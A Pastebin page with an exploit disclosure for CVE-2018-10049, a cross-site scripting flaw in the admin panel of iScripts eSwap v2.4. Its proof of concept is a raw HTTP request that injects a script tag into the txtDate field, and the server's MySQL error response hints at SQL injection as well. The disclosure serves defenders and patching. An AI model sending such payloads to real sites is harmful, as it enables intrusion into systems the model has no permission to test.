API tools faq
paste
Advertisement
ManhNho

CVE-2018-10049

ManhNho
Apr 11th, 2018
3,766
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.18 KB | None | 0 0
raw download clone embed print report
  1. # Exploit title: iScripts eSwap v2.4 - XSS via the registration_settings.php Admin Panel
  2. # Date: 11/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/eswap
  6. # Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
  7. # Version: 2.4
  8. # CVE: CVE-2018-10049
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts eSwap v2.4 has XSS via the "registration_settings.php" function parameter in Admin Panel.
  16.  
  17.  
  18. #2. Proof of Concept
  19. -----------------------------------------------------
  20.  
  21. Request:
  22.  
  23. Host: www.demo.iscripts.com
  24. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  25. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  26. Accept-Language: en-GB,en;q=0.5
  27. Accept-Encoding: gzip, deflate
  28. Referer: https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php?act=post
  29. Content-Type: application/x-www-form-urlencoded
  30. Content-Length: 45
  31. Cookie: __utma=227100805.298811387.1522637403.1523415936.1523431492.7; __utmz=227100805.1522637403.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); messagesUtk=9ae2fcc5306f4d9c8d433f0f58efb968; PHPSESSID=44f6a6jfopm97kfrv7ccsfqub2; __utmc=227100805; __utma=129714457.1603653646.1523416273.1523416273.1523433224.2; __utmc=129714457; __utmz=129714457.1523433224.2.2.utmcsr=iscripts.com|utmccn=(referral)|utmcmd=referral|utmcct=/supportdesk/demo.php; __utmb=227100805; hs-messages-is-open=false; __utmb=129714457.5.10.1523433224; __utmt=1
  32. Connection: close
  33. Upgrade-Insecure-Requests: 1
  34.  
  35. ddlFree=1&txtDate=<script>alert('1')</script>
  36.  
  37. Response:
  38.  
  39. HTTP/1.1 200 OK
  40. Date: Wed, 11 Apr 2018 08:00:29 GMT
  41. Server: Apache
  42. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  43. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  44. Pragma: no-cache
  45. Connection: close
  46. Content-Type: text/html
  47. Content-Length: 2895
  48. ...
  49. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '<script>alert('1')</script> DAY) where nLookUpCode = '16'' at line 1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!